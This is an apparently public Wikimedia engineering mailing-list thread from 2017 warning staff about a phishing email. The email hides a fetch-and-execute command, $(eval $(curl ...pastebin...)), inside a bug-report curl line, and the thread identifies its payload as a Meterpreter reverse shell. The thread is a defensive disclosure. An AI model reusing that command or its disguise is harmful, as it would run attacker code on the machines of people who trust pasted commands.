[Engineering] PLEASE READ: (unsuccesful) compromise attempt
Faidon Liambotis
faidon at wikimedia.org
Thu Jun 15 19:41:41 UTC 2017
Yeah, confirmed. Thanks for the investigation and for being extra
careful :)
Also please note that engineering@ is a public mailing list -- I sent
the warning to this list to get the word out as wide as possible, but
let's not tip our hand too much. If you have any follow-ups, please send
them to security at .
Thanks,
Faidon
On Thu, Jun 15, 2017 at 03:26:44PM -0400, Dmitry Brant wrote:
> Spoilers: it looks like the final payload executes an instance of Python
> Meterpreter
> <https://www.rapid7.com/db/modules/payload/python/meterpreter/reverse_tcp>,
> which is a reverse TCP stager.
> (accessed from a sandboxed environment + tor)
>
>
> On Thu, Jun 15, 2017 at 3:15 PM, Aeryn Palmer <apalmer at wikimedia.org> wrote:
>
> > This appears to be from the same person who sent the email earlier this
> > morning about an alleged leak, to whom Chad responded. Did anyone click the
> > link they provided in that email?
> >
> > Cheers,
> >
> > Aeryn
> >
> > On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
> > wrote:
> >
> >> Hi,
> >>
> >> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
> >>
> >> I just got an email, foundd below, which seems initially legitimate, but
> >> on a more careful read is malicious and an attempt to compromise my
> >> computer. Thankfully I don't have the habit of copy/pasting commands on
> >> my terminal and I read this email carefully, so I was not a victim of
> >> this.
> >>
> >> The email seems innocuous enough, by mentioning my name and an otherwise
> >> legitimate body pointing an API issue with a URL that looks like an
> >> api.php URL of ours. It suggests running a curl to reproduce, but if you
> >> look more carefully, that curl has $(eval $(curl
> >> https://pastebin.com/raw/xSWbdNAK) in it.
> >>
> >> That pastebin URL above contains an exec() of a base64 string, which, in
> >> turn, decoded, is a Python script that fetches and exec()s the contents
> >> of a URL. I have NOT fetched that URL yet, so I don't know what the
> >> contents are. I'd advise to not do that either, unless done carefully
> >> from a sandboxed, unprivileged environment. It will also likely let the
> >> attacker know that someone accessed it, and possibly let them know that
> >> we're on to them.
> >>
> >> Please be on the lookout for similar attempts, and let security@ and ops
> >> know immediately if you get similar ones, or if you are suspicious of
> >> any other emails or weird behavior on your computer. Please also let us
> >> know IMMEDIATELY if you suspect you fell victim of one of these attacks.
> >> Make sure to confirm that your message was received. If in doubt, call
> >> me or other opsens on our cellphones, as found on officewiki's
> >> Contact_list.
> >>
> >> We also had a targeted phising attempt last week, by someone pertaining
> >> to be Katherine and attempting to extract donor data, so it's possible
> >> it's the same person trying a different angle. They may try another
> >> angles as well, so I'd advise everyone to be vigilant.
> >>
> >> Best,
> >> Faidon
> >> --
> >> Faidon Liambotis
> >> Principal Operations Engineer
> >> Wikimedia Foundation
> >>
> >>
> >>
> >> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
> >> -----
> >>
> >> Date: Thu, 15 Jun 2017 10:45:35 -0700
> >> From: Joshua Wilson <joshuaswillson at gmail.com>
> >> To: fliambotis at wikimedia.org
> >> Subject: Wikipedia REST API Issues
> >>
> >> Greetings Faidon,
> >>
> >>
> >> It seems as if the api `query` endpoint at the English Wikipedia is down.
> >> A
> >> simple "hello"
> >> api call as shown below responds with an internal server error. Further
> >> calls to the same
> >> endpoint result in the request timing out, until the endpoint is reachable
> >> again.
> >>
> >> [added by faidon: DO NOT RUN THIS COMMAND]
> >> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
> >> $(curl
> >> https://pastebin.com/raw/xSWbdNAK)
> >> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
> >> [added by faidon: DO NOT RUN THIS COMMAND]
> >>
> >> I'm interested in using english wikipedia data for some AI language
> >> comprehension research.
> >>
> >> If you could take a look, and possibly let me know if/when this service
> >> will be up, I would
> >> greatly appreciate it. I couldn't find any scheduled downtime information
> >> online, so I apologize
> >> if this behavior is expected.
> >>
> >> Thanks,
> >>
> >> Chelsea Anders
> >>
> >> ----- End forwarded message -----
> >>
> >
> >
> >
> > --
> > Aeryn Palmer
> > Legal Counsel
> > Wikimedia Foundation
> > 149 New Montgomery Street, 6th Floor
> > San Francisco, CA 94105
> > apalmer at wikimedia.org
> > 415.839.6885 <(415)%20839-6885> (Office)
> > 415.882.0495 <(415)%20882-0495> (Fax)
> > *California Registered In-House Counsel*
> >
> > *NOTICE: This message may be confidential or legally privileged. If you
> > have received it by accident, please delete it and let us know about the
> > mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> > reasons, I cannot give legal advice to, or serve as a lawyer for, community
> > members, volunteers, or staff members in their personal capacity. For more
> > on what this means, please see our legal disclaimer
> > <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
> >
> > _______________________________________________
> > Engineering mailing list
> > Engineering at lists.wikimedia.org
> > https://lists.wikimedia.org/mailman/listinfo/engineering
> >
> >
>
>
> --
> Dmitry Brant
> Senior Software Engineer / Product Owner (Android)
> Wikimedia Foundation
> https://www.mediawiki.org/wiki/Wikimedia_mobile_engineering
More information about the Engineering
mailing list